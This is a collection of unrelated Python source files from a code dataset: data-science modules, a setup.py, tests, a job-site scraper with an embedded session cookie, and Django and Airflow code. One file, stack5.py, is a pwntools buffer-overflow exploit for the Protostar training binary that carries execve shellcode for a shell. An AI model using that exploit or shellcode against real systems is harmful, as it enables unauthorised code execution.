= None\r\n # Cumulative lambda\r\n self.sum_lambda = 0 \r\n\r\n def Load_Asset_Data(self,Model):\r\n date_base_name = Model['DB_Name']\r\n df = Read_Asset_Data(date_base_name,self.type,self.id)\r\n dic = df.to_dict('r') \r\n dic = dic[0]\r\n dic['Opt_Year'] = datetime.date(dic['Opt_Year'], 1, 1)\r\n\r\n return dic\r\n\r\n def Load_Condition(self,Model,Condition,HI_Limits):\r\n date_base_name = Model['DB_Name']\r\n tables = Model['Tables']\r\n dict_condition = {}\r\n w_t = 0 # Total weights of conditions defined by the model\r\n sum_w = 0\r\n self.re = 0\r\n\r\n for System in Condition:\r\n for cond in Condition[System]:\r\n table = tables[cond]\r\n df = Read_Table_Conditions(date_base_name,table,cond,self.id)\r\n w_t += Condition[System][cond]\r\n if not df.empty:\r\n w = Condition[System][cond]\r\n sum_w += w\r\n con_limits = HI_Limits[cond]\r\n dict_condition[cond] = Asset_Condition(df,w,con_limits)\r\n\r\n self.re = sum_w/w_t # ri ->Reliability index\r\n self.w_total = sum_w # Sum of total weight available conditions\r\n return(dict_condition)\r\n\r\n\r\n def Load_DB_Model(self,db_struc):\r\n data = Read_Table(db_struc)\r\n data = data[self.type]\r\n return data\r\n\r\n def Weights(self):\r\n t_name = self.case_path+'APM/DATA/TABLES/Asset_HI_Weights.json' \r\n data = Read_Table(t_name)\r\n data = data[self.type]\r\n return data\r\n\r\n def Load_Cond_Limits(self):\r\n t_name = self.case_path+'APM/DATA/TABLES/Asset_Condition_Limits.json'\r\n data = Read_Table(t_name)\r\n data = data[self.type]\r\n return data\r\n\r\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\r\n def Load_Lambda_Constants(self,case='Con_1'):\r\n t_name = self.case_path+'APM/DATA/TABLES/Asset_Lambda_Factors.json' \r\n data = Read_Table(t_name)\r\n #data = Read_Table('APM/DATA/TABLES/Asset_Lambda_Factors.json')\r\n data = data[self.type]\r\n data = data[case]\r\n a,b,c = data['a'],data['b'],data['c']\r\n\r\n def compute_lambda(HI):\r\n if HI==None:\r\n return None\r\n else: \r\n return a*np.exp(b*HI)+c\r\n \r\n return compute_lambda\r\n\r\n def Eval_Asset_Condition(self,date,desc_date=None): \r\n #\r\n condition = self.cond\r\n\r\n sum_sw = 0\r\n sum_w = 0\r\n\r\n if desc_date==None or date0:\r\n #df = df.sort('Date')\r\n df = df.sort_values(by=['Date'])\r\n date =df['Date'].dt.date.values\r\n self.opt_date = date[0]-datetime.timedelta(days=365*5)\r\n x = np.asarray([(x - self.opt_date).days/365.25 for x in date])\r\n y = df['val_nor'].values\r\n \r\n x_end = x[-1]+35 # Assume 35 years as end of life\r\n # Add initial and final contion last values \r\n x = np.concatenate(([0], x, [x_end]))\r\n y = np.concatenate(([0], y, [1]))\r\n\r\n fit_f = Fitt_constants_HI(x,y)\r\n return fit_f\r\n\r\n# Eval constion using the fitted function\r\n def eval_cond_fit_func(self,date):\r\n #x = (date.date() - self.opt_date).days/365 # Date to eval in years\r\n x = (date - self.opt_date).days/365.25 # Date to eval in years\r\n #print(date)\r\n #x = (date.date() - self.opt_date).days/365 # Date to eval in years\r\n y = self.forecast_f(x) \r\n return y\r\n\r\n def Update_Data_Frame(self,df):\r\n con_n = []\r\n for val in df.Val.values:\r\n val_norm = self.eval_cond_f(val)\r\n con_n.append(float(val_norm))\r\n df['val_nor'] = con_n # Add condition assessment to the historic dataframe\r\n return df\r\n\r\n def eval_condition_function(self):\r\n x = self.limits \r\n #y = [0,0.25,0.5,0.75,1]\r\n y = np.linspace(0, 1, len(x), endpoint=True)\r\n\r\n\r\n low = y[0]\r\n upp = y[-1]\r\n if x[0]>x[1]:\r\n low = y[-1]\r\n upp = y[0]\r\n return interp1d(x, y,fill_value=(low, upp), bounds_error=False)\r\n","sub_path":"APM/BIN/APM_Module.py","file_name":"APM_Module.py","file_ext":"py","file_size_in_byte":18982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"610389788","text":"import os\nfrom sys import version\n\n#from distutils.core import setup\nfrom setuptools import setup\n\n# Utility function to read the README.md file from main directory, used for\n# the long_description.\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n name='pyzsync',\n version='0.2',\n description='''A Python 3 module which implements the zsync binary\n diff algorithm.''',\n #long_description=read('README'),\n author='Francisco Silveira, Georgy Angelov, Eric Pruitt, Isis Lovecruft',\n author_email='franciscosilveira463@gmail.com',\n url='https://github.com/FranciscoSilveira/pyzsync',\n py_modules=['pyzsync'],\n license=['Unlicense'],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Console',\n 'Environment :: MacOS X',\n 'Environment :: Win32 (MS Windows)',\n 'Intended Audience :: Developers',\n 'Intended Audience :: End Users/Desktop',\n 'License :: Public Domain',\n 'Programming Language :: Python :: 3',\n 'Topic :: Security :: Cryptography',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: System :: Archiving',\n 'Topic :: System :: Archiving :: Backup',\n 'Topic :: System :: Archiving :: Compression', ],\n packages=['pyzsync'],\n package_dir={'pyzsync': ''},\n package_data={'': ['README\\.md']},\n python_requires='>=3'\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"503576693","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport pycox\nfrom sklearn.preprocessing import StandardScaler, PolynomialFeatures\nfrom sklearn_pandas import DataFrameMapper\nimport torch\nimport torchtuples as tt\nfrom pycox.evaluation import EvalSurv\nfrom pycox.models import CoxPH\nimport warnings\nwarnings.filterwarnings('ignore')\nimport joblib\n\nclass WeightedConformalPrediction():\n def __init__(self,df_train,train_frac = 0.8,num_nodes=[32,32],\n out_features=1,batch_norm=True,\n batch_size=128,dropout=0.1,output_bias=False,\n epochs = 512, callbacks = [tt.callbacks.EarlyStopping()],\n verbose = True,classification_model='LR',\n percentile = 0.95,epsilon=0.01):\n self.df_train = df_train\n # self.p_t = len(self.df[self.df['event']==1])/len(self.df)\n self.train_frac = train_frac\n # self.cali_frac = calibration_frac\n self.num_nodes = num_nodes\n self.out_features = out_features\n self.batch_norm = batch_norm\n self.batch_size = batch_size\n self.dropout = dropout\n self.output_bias = output_bias\n self.epochs = epochs\n self.callbacks = callbacks\n self.verbose = verbose\n self.clf_model = classification_model\n self.epsilon = epsilon\n self.percentile = percentile\n self.V = None\n self.W = None\n self.p_hat = None\n self.T_h = None\n self.x_mapper = None\n self.get_target = lambda df: (df['duration'].values, df['event'].values)\n self.bh = None\n self.model = None\n \n # 划分数据,输入原始数据,选择划分的比例,输出训练集验证集和calibration set\n def split_data(self):\n random_idx = np.random.permutation(range(len(self.df_train)))\n train_idx = random_idx[:int(len(self.df_train)*self.train_frac)]\n val_idx = random_idx[int(len(self.df_train)*self.train_frac):]\n self.Z_tr = self.df_train.iloc[train_idx,:]\n self.Z_val = self.df_train.iloc[val_idx,:]\n \n def standardize(self):\n# cols_standardize = ['x0', 'x7', 'x8','x9','x10','x11','x12','x13']\n# cols_leave = ['x1', 'x2', 'x3', 'x4','x5','x6']\n # cols_standardize = ['x0', 'x1', 'x2', 'x3', 'x8']\n # cols_leave = ['x4', 'x5', 'x6', 'x7']\n cols_standardize = ['x0','x1','x2']\n standardize = [([col], StandardScaler()) for col in cols_standardize]\n# leave = [(col, None) for col in cols_leave]\n # polyfeature = [([col], PolynomialFeatures()) for col in cols_standardize]\n self.x_mapper = DataFrameMapper(standardize)\n \n self.x_train = self.x_mapper.fit_transform(self.Z_tr).astype('float32')\n self.x_val = self.x_mapper.transform(self.Z_val).astype('float32')\n # self.x_ca = self.x_mapper.transform(self.Z_ca).astype('float32')\n \n \n self.y_train = self.get_target(self.Z_tr)\n self.y_val = self.get_target(self.Z_val)\n # self.durations_ca, self.events_ca = self.get_target(self.Z_ca)\n self.val = self.x_val, self.y_val\n self.in_features = self.x_train.shape[1]\n \n def preprocessing(self):\n self.split_data()\n self.standardize()\n\n def run_preprocessing(self):\n if self.x_mapper == None:\n self.preprocessing()\n \n def neural_network_cox(self):\n self.net = torch.nn.Sequential(\n torch.nn.Linear(self.in_features, 32),\n torch.nn.ReLU(),\n torch.nn.BatchNorm1d(32),\n torch.nn.Dropout(0.1),\n\n torch.nn.Linear(32, 32),\n torch.nn.ReLU(),\n torch.nn.BatchNorm1d(32),\n torch.nn.Dropout(0.1),\n\n torch.nn.Linear(32, self.out_features)\n )\n self.model = CoxPH(self.net, torch.optim.Adam)\n self.model.fit(self.x_train, self.y_train, self.batch_size, self.epochs, self.callbacks, self.verbose,\n val_data=self.val, val_batch_size=self.batch_size)\n \n def find_baseline_hazard_non_zero_idx(self):\n if self.model == None:\n self.neural_network_cox()\n self.baseline_hazards = self.model.compute_baseline_hazards()\n self.non_zero_idx = self.baseline_hazards[self.baseline_hazards>0].index[1] # 计算第一个非零元素的索引\n self.bh = self.baseline_hazards.loc[self.non_zero_idx]\n \n def compute_nonconformal_score_single(self,t):\n R = self.Z_tr[self.Z_tr['duration']>=t] # 找到at risk的人的covariates\n if len(R) == 0: # 如果没找到at risk的人就跳过\n return None\n x_R = self.x_mapper.transform(R).astype('float32')\n ch_r = self.model.predict_cumulative_hazards(x_R)\n exp_g_r = ch_r.loc[self.non_zero_idx]/self.bh\n return exp_g_r\n \n # 计算nonconformal score的函数,给定一个预测hazard的模型,training set\n # 和calibration set以及base hazard,输出结果\n def compute_nonconformal_score(self):\n # print('WCP:compute nonconformal score')\n if self.bh == None:\n self.find_baseline_hazard_non_zero_idx()\n Z_ca_1 = self.Z_ca[self.Z_ca['event']==1] # calibration set中发病的样本\n x_ca = self.x_mapper.transform(Z_ca_1).astype('float32')\n durations_test_1, events_test_1 = self.get_target(Z_ca_1)\n cumulative_hazards = self.model.predict_cumulative_hazards(x_ca)\n exp_g = cumulative_hazards.loc[self.non_zero_idx].div(self.bh)\n self.V = list()\n for i in range(len(x_ca)): # nonconformal score\n exp_g_r = self.compute_nonconformal_score_single(durations_test_1[i])\n if exp_g_r is None:\n self.V.append(np.inf)\n else:\n self.V.append(np.log(exp_g[i])-np.log(np.sum(exp_g_r)+exp_g[i]))\n print('[Mean]\\t%.2f\\t [Std.]\\t %.2f\\t[Max]\\t%.2f\\t[Min]\\t%.2f'%(np.mean(self.V),np.std(self.V),np.max(self.V),np.min(self.V)))\n self.V = np.array(self.V+[np.inf])\n \n # 计算weight的函数,输入traning set, calibration set以及一个用来估计P(T=1|X=x)的分类模型\n def compute_weight(self):\n # print('WCP:compute weight')\n Z_ca_1 = self.Z_ca[self.Z_ca['event']==1]\n X_tr = self.x_train\n X_ca = self.x_mapper.transform(Z_ca_1).astype('float32')\n C_tr = self.Z_tr['event'] # training set的event,用于之后训练分类模型\n # 根据输入选择分类模型\n if self.clf_model == 'RF':\n from sklearn.ensemble import RandomForestClassifier\n self.clf = RandomForestClassifier(max_depth=6,random_state=0)\n elif self.clf_model == 'LR':\n from sklearn.linear_model import LogisticRegression\n self.clf = LogisticRegression(random_state=0)\n elif self.clf_model == 'XGBoost':\n import xgboost as xgb\n self.clf = xgb.XGBClassifier()\n self.clf.fit(X_tr,C_tr) # 训练分类模型\n p_predict = self.clf.predict_proba(X_ca)[:,1] # 预测p_hat\n p_predict[p_predict<0.1] = 0.1\n p_predict[p_predict>0.9] = 0.9\n print(np.max(p_predict),np.min(p_predict))\n self.W = np.divide(1-p_predict,p_predict) # 估计w_hat\n \n def run_compute_nonconformal_score(self):\n if self.V == None:\n self.compute_nonconformal_score()\n else:\n pass \n \n def run_conpute_weight(self):\n if self.W == None:\n self.compute_weight()\n else:\n pass\n\n # 计算normalized weight,输入计算的weight,test point,训练过的分类模型\n def compute_normalized_weight(self,x):\n '''\n x: test point\n '''\n # print('WCP:compute normalized weight')\n p_predict = self.clf.predict_proba(x)[0,1] # 预测test point对应的T=1的概率\n w_predict = self.p_t/p_predict # 估计p_hat\n normalize_term = np.sum(self.W)+w_predict \n p_hat = self.W/normalize_term # 计算所有病人的p_hat\n p_inf = w_predict/normalize_term # 计算无穷点的weight\n\n p_hat = np.append(p_hat,[p_inf])\n return p_hat\n \n # 计算对应的置信区间,输入nonconformal score, normalized weight p_hat, p_inf,以及指定的percentile\n def compute_quantile(self,t,p_hat,exp_g_x):\n exp_g_x_r = self.compute_nonconformal_score_single(t)\n if exp_g_x_r is None:\n return 1\n V_x = np.log(exp_g_x)-np.log(np.sum(exp_g_x_r))\n p_hat_leave = p_hat[self.V<=V_x[0]]\n return sum(p_hat_leave)\n \n def weighted_conformal_prediction(self,x,percentile=0.95):\n \n ch = self.model.predict_cumulative_hazards(x)\n exp_g_x = ch.loc[self.non_zero_idx]/self.bh\n\n p_hat = self.compute_normalized_weight(x)\n\n if percentile < 0.5:\n quantile = 1\n t = 5\n quantile = self.compute_quantile(t,p_hat,exp_g_x)\n while (quantile > percentile):\n step = t*(quantile-percentile)\n if step < 0.01:\n step = 0.01\n t = t - sgn*step\n if int(t) < 0:\n t = 0\n break\n exp_g_x_r = self.compute_nonconformal_score_single(t)\n V_x = np.log(exp_g_x)-np.log(np.sum(exp_g_x_r))\n quantile = sum(p_hat[self.V<=V_x[0]])\n print(quantile,t)\n\n t_l = 0\n t_h = t\n else:\n quantile_l,quantile_h = 1,0\n t_l = 5\n t_h = 5\n quantile_l = self.compute_quantile(t_l,p_hat,exp_g_x)\n while (quantile_l>(1-percentile)/2):\n step_l = t_l*(quantile_l-(1-percentile)/2)\n if step_l < 0.01:\n step_l = 0.01\n t_l = t_l - step_l\n if int(t_l) <= 0:\n t_l = 0\n break\n exp_g_x_r = self.compute_nonconformal_score_single(t_l)\n if exp_g_x_r is None:\n quantile_l = 1\n continue\n V_x = np.log(exp_g_x)-np.log(np.sum(exp_g_x_r))\n quantile_l = sum(p_hat[self.V<=V_x[0]])\n # print(quantile_l,t_l)\n \n quantile_h = self.compute_quantile(t_h,p_hat,exp_g_x)\n while (quantile_h<(0.5+self.percentile/2)):\n step_h = t_h*(0.5+self.percentile/2-quantile_h)\n if step_h < 0.01:\n step_h = 0.01\n t_h = t_h + step_h\n exp_g_x_r = self.compute_nonconformal_score_single(t_h)\n if exp_g_x_r is None:\n quantile_h = 1\n continue\n V_x = np.log(exp_g_x)-np.log(np.sum(exp_g_x_r))\n # print(V_x)\n quantile_h = sum(p_hat[self.V<=V_x[0]])\n \n return (t_l, t_h)\n\n def run_training_step(self):\n print('--'*30)\n print('Begin Preprcessing Algorithm 1')\n self.run_preprocessing()\n print('--'*30)\n try:\n self.load_parameters(V_path = './model_data/V_alg_1.txt',W_path='./model_data/W_alg_1.txt',bh_path='./model_data/bh.txt',clf_path='./model_data/clf.model',model_path='./model_data/net_cox.model')\n print('Loading Parameters From Files')\n except:\n print('Begin Noncoformal Score')\n self.run_compute_nonconformal_score()\n print('--'*30)\n print('Begin Compute Wieght')\n self.run_conpute_weight()\n self.save_parmeters(V_path = './model_data/V_alg_1.txt',W_path='./model_data/W_alg_1.txt',bh_path='./model_data/bh.txt',clf_path='./model_data/clf.model',model_path='./model_data/net_cox.model')\n plt.hist(self.W,bins=100)\n plt.savefig('W.pdf')\n print(len(self.W),len(self.V))\n \n def get_T(self,x,percentile=0.95):\n t_l,t_h = self.weighted_conformal_prediction(x,percentile)\n return (t_l,t_h)\n \n def get_nonconformal_score_of_calibration(self):\n if self.V is None:\n self.compute_nonconformal_score()\n return self.V\n \n def get_weight(self):\n if self.W is None:\n self.compute_weight()\n return self.W\n \n def get_normalized_weight(self,x):\n if self.p_hat is None:\n self.compute_normalized_weight(x)\n \n return self.p_hat\n\n def save_parmeters(self,V_path = 'V_alg_1.txt',W_path='W_alg_1.txt',bh_path='bh.txt',clf_path='clf.model',model_path='net_cox.model'):\n np.savetxt(V_path,self.V)\n np.savetxt(W_path,self.W)\n np.savetxt(bh_path,np.array([self.bh,self.non_zero_idx]))\n joblib.dump(self.clf,clf_path)\n joblib.dump(self.model,model_path)\n\n\n def load_parameters(self,V_path = 'V_alg_1.txt',W_path='W_alg_1.txt',bh_path='bh.txt',clf_path='clf.model',model_path='net_cox.model'):\n self.V = np.loadtxt(V_path)\n self.W = np.loadtxt(W_path)\n self.bh = float(np.loadtxt(bh_path)[0])\n self.non_zero_idx = float(np.loadtxt(bh_path)[1])\n self.clf = joblib.load(clf_path)\n self.model = joblib.load(model_path)\n","sub_path":"Final Model/cox_ph/weighted_conformal_prediction_coxph.py","file_name":"weighted_conformal_prediction_coxph.py","file_ext":"py","file_size_in_byte":13276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"373130015","text":"from pwn import *\n\ncontext.log_level = 'debug'\n\nf = 'stack5'\np = process('../problems/' + f)\nb = ELF('../problems/' + f)\n\npadding = 'A'*76\nret = p32(0xffffd260) # turn off ASLR\nnop = '\\x90'*200\nshellcode = \"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\" + \\\n \"\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\" + \\\n \"\\xe3\\x89\\xc1\\x89\\xc2\\xb0\\x0b\" + \\\n \"\\xcd\\x80\\x31\\xc0\\x40\\xcd\\x80\"\n\npayload = padding + ret + nop + shellcode\n\nraw_input()\n\np.sendline(payload)\n\np.interactive()\n","sub_path":"learning/protostar/stack/stack5.py","file_name":"stack5.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"309648183","text":"# -*- coding: utf-8 -*-\n\nimport unittest\nfrom datetime import datetime\nfrom google.appengine.ext import testbed\nfrom dynamic.backends import _appengine, _sqldb\n\n\nclass MockRepo:\n\n def __init__(self, config):\n self._version = config['version']\n self._pages = {}\n for p in config['pages'].split(';'):\n elems = p.split(':')\n self._pages[elems[0]] = elems[1]\n\n def version(self):\n return self._version\n\n def pages(self):\n return set(self._pages.iterkeys())\n\n def version_of(self, p):\n return self._pages[p]\n\n def content_of(self, p):\n return (\n True,\n '07 September 2011',\n p,\n u' ',\n u'this is test content',\n unicode(self._pages[p]),\n )\n\n\nclass DatabaseTest(unittest.TestCase):\n\n def setUp(self):\n self.testbed = testbed.Testbed()\n self.testbed.activate()\n self.testbed.init_datastore_v3_stub()\n self.db = self._database()\n self.repo = MockRepo({'version': '123', 'pages': u'unit-test-1:abc;unit-test-2:def'})\n self.db.synchronize(self.repo)\n\n def tearDown(self):\n self.testbed.deactivate()\n\n def test_synchronize(self):\n self.assertEquals(self.db.version(), self.repo.version())\n self.assertEquals(len(self.db.pages()), 2)\n self.assertEquals(self.db.version_of('unit-test-1'), 'abc')\n\n def test_update(self):\n newrepo = MockRepo({'version': '124', 'pages': u'unit-test-1:def;/foo/bar/unit-test-3:pqr'})\n self.assertEquals(self.db.synchronize(newrepo)[0], '124')\n self.assertEquals(len(self.db.pages()), 2)\n self.assertEquals(self.db.version_of('unit-test-1'), 'def')\n\n def test_getpage(self):\n newrepo = MockRepo({'version': '124', 'pages': u'/top/mid/leaf1:ver;/top/mid/leaf2:ver'})\n self.assertEquals(self.db.synchronize(newrepo)[0], '124')\n self.assertEquals(self.db.content_of('badpage'), None)\n content = self.db.content_of('/top/mid/leaf1')\n self.assertEquals(len(content), 7)\n self.assertEquals(content['url'], '/top/mid/leaf1')\n self.assertEquals(content['breadcrumb'], ['/', '/top/', '/top/mid/'])\n self.assertEquals(content['today'].day, datetime.today().day)\n\n def test_getindex(self):\n newrepo = MockRepo({'version': '124', 'pages': u'/a/b1/c:ver;/a/b1/c1:ver;/a/b2/c3:ver'})\n self.assertEquals(self.db.synchronize(newrepo)[0], '124')\n self.assertEquals(len(self.db.index_of('/')['pages']), 3)\n self.assertEquals(len(self.db.index_of('/a/b1')['pages']), 2)\n self.assertEquals(len(self.db.index_of('/a/b2')['pages']), 1)\n self.assertEquals(len(self.db.index_of('/a/d')['pages']), 0)\n\n\nclass AppEngineTest(DatabaseTest):\n\n def _database(self):\n return _appengine()\n\n\nclass SqlDbTest(DatabaseTest):\n\n def _database(self):\n return _sqldb()\n","sub_path":"attic/web/ajdweb/dynamic/test/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"408229800","text":"\n# boss直聘数据爬取\n\nimport requests, re, json, time\nimport pymysql\nimport random\nfrom lxml import etree\n\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String, ForeignKey, UniqueConstraint, Index, Text, DateTime\nfrom sqlalchemy.orm import sessionmaker, relationship\nfrom sqlalchemy import create_engine\n\nengine = create_engine(\"mysql+pymysql://root:root@192.168.0.7:3306/zhipin\", max_overflow=5)\nBase = declarative_base()\nsession = ''\nkeyword = 'php' # 搜索关键词\ncitys = {'c101280100':'广州', 'c101280600':'深圳', 'c101020100':'上海'} # key 从 0 开始\ncity_select = 0\n\nfetch_host = 'https://www.zhipin.com'\nheaders = {\n \"User-Agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0\",\n \"cookie\": \"sid=sem_pz_bdpc_index; __g=sem_pz_bdpc_index; _uab_collina=155367027601068152492336; __c=1553670279; lastCity=101280100; __l=r=https%3A%2F%2Fwww.zhipin.com%2F%3Fsid%3Dsem_pz_bdpc_index&l=%2Flogin.zhipin.com%2F%3Fka%3Dheader-login&g=%2Fwww.zhipin.com%2F%3Fsid%3Dsem_pz_bdpc_index; toUrl=https%3A%2F%2Fwww.zhipin.com%2Fgeek%2Fnew%2Findex%2Frecommend.html; JSESSIONID=\"\"; Hm_lvt_194df3105ad7148dcf2b98a91b5e727a=1563373739; Hm_lpvt_194df3105ad7148dcf2b98a91b5e727a=1564363308; __a=11457756.1553670275.1553670275.1553670279.372.2.371.372\",\n \"authority\":\"www.zhipin.com\",\n \"path\":\"/job_detail/?query=php&city=101280100&industry=&position=\",\n \"referer\":\"https://www.zhipin.com/?sid=sem_pz_bdpc_index\",\n \"upgrade-insecure-requests\":\"1\"\n}\nproxies = {\n 'http': 'socks5://127.0.0.1:1081'\n}\n\n# 创建表\nclass jobs(Base):\n __tablename__ = 'jobs'\n id = Column(Integer, primary_key=True)\n job_url = Column(String(255))\n job_jid = Column(Integer)\n job_jobid = Column(Integer)\n job_title = Column(String(50))\n salary = Column(String(50))\n address = Column(String(50))\n experience = Column(String(50))\n xueli = Column(String(50))\n company = Column(String(50))\n company_type = Column(String(50))\n financing = Column(String(50))\n scale = Column(String(50))\n portrait = Column(String(255))\n username = Column(String(50))\n role = Column(String(50))\n add_time = Column(String(50))\n keyword = Column(String(50))\n city = Column(String(30))\n\nclass job_detail(Base):\n __tablename__ = 'job_detail'\n id = Column(Integer, primary_key=True)\n job_id = Column(Integer)\n active_status = Column(Integer)\n job_detail = Column(Text)\n company_introduce = Column(Text)\n commerce_info = Column(Text)\n add_time = Column(DateTime)\n\ndef parse_one_page(html):\n items = re.findall('job-primary.*?href=\"(.*?)\".*?data-jid=\"(.*?)\".*?data-jobid=\"(.*?)\".*?job-title.*?>(.*?)<.*?red.*?>(.*?)<.*?

(.*?)(.*?)<.*?/em>(.*?)

.*?search_list_company.*?>(.*?)<.*?

(.*?)<.*?/em>(.*?)<.*?/em>(.*?)<.*?src=\"(.*?)\".*?>(.*?)<.*?/em>(.*?)<', html, re.S)\n for item in items:\n yield {\n 'job_url': item[0],\n 'job_jid': item[1],\n 'job_jobid': item[2],\n 'job_title': item[3],\n 'salary': item[4],\n 'address': item[5],\n 'experience': item[6],\n 'xueli': item[7],\n 'company': item[8],\n 'company_type': item[9],\n 'financing': item[10],\n 'scale': item[11],\n 'portrait': item[12], # 头像\n 'username': item[13],\n 'role': item[14],\n 'add_time': time.strftime('%Y-%m-%d %H:%M:%S'),\n 'keyword': keyword,\n 'city': tuple(citys.values())[city_select]\n }\n\ndef get_one_page(url):\n response = requests.get(url, headers=headers, proxies=proxies)\n return response.text\n\ndef get_jobs_detail(url):\n url = fetch_host + url\n response = requests.get(url, headers=headers, proxies=proxies)\n\n return response.text\n\n\ndef insert_mysql(item):\n db = pymysql.connect(host='192.168.0.7', user='root', password='root', port=3306)\n cursor = db.cursor()\n cursor.execute('USE zhipin')\n data = item\n table = 'jobs'\n keys = ', '.join(data.keys())\n values = ', '.join(['%s'] * len(data))\n sql = 'INSERT INTO {table} ({keys}) VALUES ({values})'.format(table=table, keys=keys, values=values)\n try:\n if cursor.execute(sql, tuple(data.values())):\n print('正在采集: ' + item['job_title'] + '------' + item['company'])\n db.commit()\n except Exception as e:\n print(e)\n db.rollback()\n db.close()\n\ndef main(page):\n url = 'https://www.zhipin.com/'+ tuple(citys.keys())[city_select] +'/?query=' + keyword + '&page=' + str(page) + '&ka=page-' + str(page)\n html = get_one_page(url)\n for item in parse_one_page(html):\n job_jobid = item['job_jobid']\n row = session.query(jobs).filter_by(job_jobid=job_jobid).first()\n if not getattr(row, 'job_jobid', None):\n insert_mysql(item)\n # print(item)\n else:\n print(row.company + '------已存在')\n\nif __name__==\"__main__\":\n Base.metadata.create_all(engine)\n #创建mysql操作对象\n Session = sessionmaker(bind=engine)\n session = Session()\n\n # 采集列表页\n for page in range(1,12):\n cicle_time = random.uniform(2, 6)\n print('当前采集第: ' + str(page) + '页' + '-----睡眠时间:' + str(cicle_time) + '秒')\n time.sleep(cicle_time)\n main(page)\n\n # 采集详情页\n rows = session.query(jobs).all()\n if rows:\n for row in rows:\n detail = session.query(job_detail).filter_by(job_id=row.id).first()\n if not detail:\n detail_html = get_jobs_detail(row.job_url)\n dh = etree.HTML(detail_html)\n job_id = row.id\n job_info = dh.xpath('//div[@class=\"job-sec\"][1]//text()')\n job_info = \" \".join(job_info) # 转换为字符串\n active_status = re.findall('job-detail.*?detail-op.*?/em>(.*?)<', detail_html, re.S)[0]\n company_introduce = dh.xpath('//div[contains(@class,\"job-sec\") and contains(@class,\"company-info\")]//text()')\n company_introduce = \" \".join(company_introduce)\n commerce_info = re.findall('工商信息(.*?)查看全部', detail_html, re.S)\n commerce_info = \" \".join(commerce_info)\n add_time = time.strftime('%Y-%m-%d %H:%M:%S')\n jd_obj = job_detail(job_id=job_id, job_detail=job_info, active_status=active_status, company_introduce=company_introduce, commerce_info=commerce_info, add_time=add_time)\n session.add(jd_obj)\n session.commit()\n cicle_time = random.uniform(2, 6)\n time.sleep(cicle_time)\n print('正在采集: ' + row.job_title + '------' + row.company + '-----睡眠时间:' + str(cicle_time) + '秒')\n else:\n print(row.job_title + '------' + row.company + '-----已存在')\n else:\n print('failed')\n","sub_path":"zhipin.py","file_name":"zhipin.py","file_ext":"py","file_size_in_byte":7015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"87515154","text":"import torch\nimport h5py\nimport numpy as np\n\nfrom torch.utils.data import Dataset\n\nclass WChPointnetDataset(Dataset):\n\n def __init__(self, path, cols_to_include, train_indices, val_indices, device):\n \"\"\"\n Pointnet dataset object for WatChMaL data.\n path: location of hdf5 file\n cols_to_include: list containing index numbers of which columns to use. \n \"\"\"\n \n self.cols_to_include = cols_to_include\n self.train_indices = train_indices\n self.val_indices = val_indices\n self.device = device\n\n f = h5py.File(path, 'r')\n hdf5_event_data = f[\"event_data\"]\n hdf5_labels = f[\"labels\"]\n\n assert hdf5_event_data.shape[0] == hdf5_labels.shape[0]\n\n event_data_shape = hdf5_event_data.shape\n event_data_offset = hdf5_event_data.id.get_offset()\n event_data_dtype = hdf5_event_data.dtype\n\n #this creates a memory map - i.e. events are not loaded in memory here\n #only on get_item\n self.point_clouds = np.memmap(path, mode='r', shape=event_data_shape,\n offset=event_data_offset, dtype=event_data_dtype)\n self.labels = np.array(hdf5_labels)\n\n def __getitem__(self, idx):\n x = torch.from_numpy(self.point_clouds[idx][:, self.cols_to_include]/np.array([100,100,100,1]))\n x = x.float()\n y = torch.tensor([self.labels[idx]], dtype=torch.int64)\n \n return x.to(self.device), y.to(self.device)\n\n def __len__(self):\n return self.labels.shape[0]\n\n\n\n \n\n","sub_path":"pointnet/io_util/dataset2_kn.py","file_name":"dataset2_kn.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"593617883","text":"from django.conf.urls import url\nfrom . import views\n\napp_name = 'PrayerWall'\nurlpatterns = [\n url(r'^$', views.prayerWall, name=\"PrayerWall\"),\n url(r'^addnewprayerpage/$', views.addNewPrayerPage, name=\"AddNewPrayerPage\"),\n url(r'^addnewprayeraction/$', views.addNewPrayer, name=\"AddNewPrayer\"),\n url(r'^numprayedplusone/(?P[0-9]+)/$', views.numPrayedPlusOne, name=\"NumPrayedPlusOne\")\n]\n","sub_path":"PrayerWall/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"575910522","text":"from datetime import datetime, timedelta\nfrom airflow import DAG\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.models import Variable\nimport sys\nimport subprocess\nimport zlib\n\nsys.path.insert(0, '/home/curw/git/DSS-Framework/local_dss_workflow/plugins/operators')\nfrom gfs_sensor import GfsSensorOperator\n\nsys.path.insert(0, '/home/curw/git/DSS-Framework/db_util')\nfrom dss_db import RuleEngineAdapter\n\nsys.path.insert(0, '/home/curw/git/DSS-Framework/accuracy_unit/wrf')\nfrom wrf_accuracy import 